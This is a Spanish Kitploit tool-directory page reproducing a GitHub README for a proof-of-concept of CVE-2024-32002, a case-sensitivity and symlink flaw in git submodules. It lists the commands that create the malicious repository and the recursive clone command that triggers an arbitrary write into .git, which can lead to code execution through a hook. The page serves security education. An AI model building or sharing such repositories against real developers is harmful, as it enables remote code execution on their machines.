Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2024-32002-poc-aw — Un PoC para CVE-2024-32002 que demuestra escritura arbitraria en el directorio .git. | Kitploit
Herramientas/GitHubGitHub/jakob-pennington/cve-2024-32002-poc-aw
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubjakob-pennington/cve-2024-32002-poc-aw

cve-2024-32002-poc-aw

Un PoC para CVE-2024-32002 que demuestra escritura arbitraria en el directorio .git.

Ver Repositorio
45hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-32002 PRC AW

Un POC para CVE-2024-32002 que demuestra escritura arbitraria en el directorio .git.

Vea cve-2024-32002-submodule-aw para el repositorio de submódulo relacionado.

Lo que contiene este repositorio

  • Un enlace simbólico con un nombre arbitrario que enlaza al directorio .git.
  • Un archivo .gitmodules que define el submódulo malicioso.

Cómo recrear este repositorio

Este repositorio fue creado en Linux (WSL2, para ser específico). Esto es importante, el repositorio malicioso solo puede crearse en un sistema de archivos sensible a mayúsculas y minúsculas.

  1. Crear un enlace simbólico, usando solo caracteres en minúsculas
root@kitploit:~
ln -s .git submodule

Notas:

  • El enlace simbólico debe apuntar a la carpeta .git, ya que ahí es donde queremos escribir archivos
  • El nombre del enlace simbólico (submodule) es arbitrario, pero debe comenzar con un carácter en minúscula
  • Esto es importante, porque los caracteres en minúsculas se ordenan antes que los caracteres en mayúsculas. Cuando la máquina que clona se confunde sobre dónde escribir los archivos del submódulo, queremos que elija el enlace simbólico y no un directorio normal.
  1. Agregar el submódulo malicioso, notando la diferencia de mayúsculas/minúsculas en el nombre del directorio del submódulo
root@kitploit:~
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists

Notas:

  • El nombre del submódulo importa, entrará en juego al colocar nuestro hook en el submódulo.
  • El primer segmento de la ruta del submódulo ("Submodule") debe coincidir con el nombre del enlace simbólico anterior, solo diferenciándose en mayúsculas/minúsculas.
  • Debe haber al menos otro segmento en la ruta, ya que git solo clonará submódulos en un directorio vacío. Sin embargo, creará directorios por nosotros, así que elegimos "notexists" para demostrarlo.

Cómo ejecutar el POC

  1. Verifique si tiene una versión vulnerable de git. Consulte el aviso de GitHub para las versiones afectadas.
root@kitploit:~
git --version
  1. Piense si quiere ejecutar a sabiendas un comando que podría lograr RCE... Este repositorio es benigno, pero ¿está seguro?
  2. Ejecute el siguiente comando:
root@kitploit:~
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git
  1. Eche un vistazo al directorio .git. ¿Ve algo fuera de lugar? Pista: ¿Qué archivos hay en el submódulo.
Descargar herramienta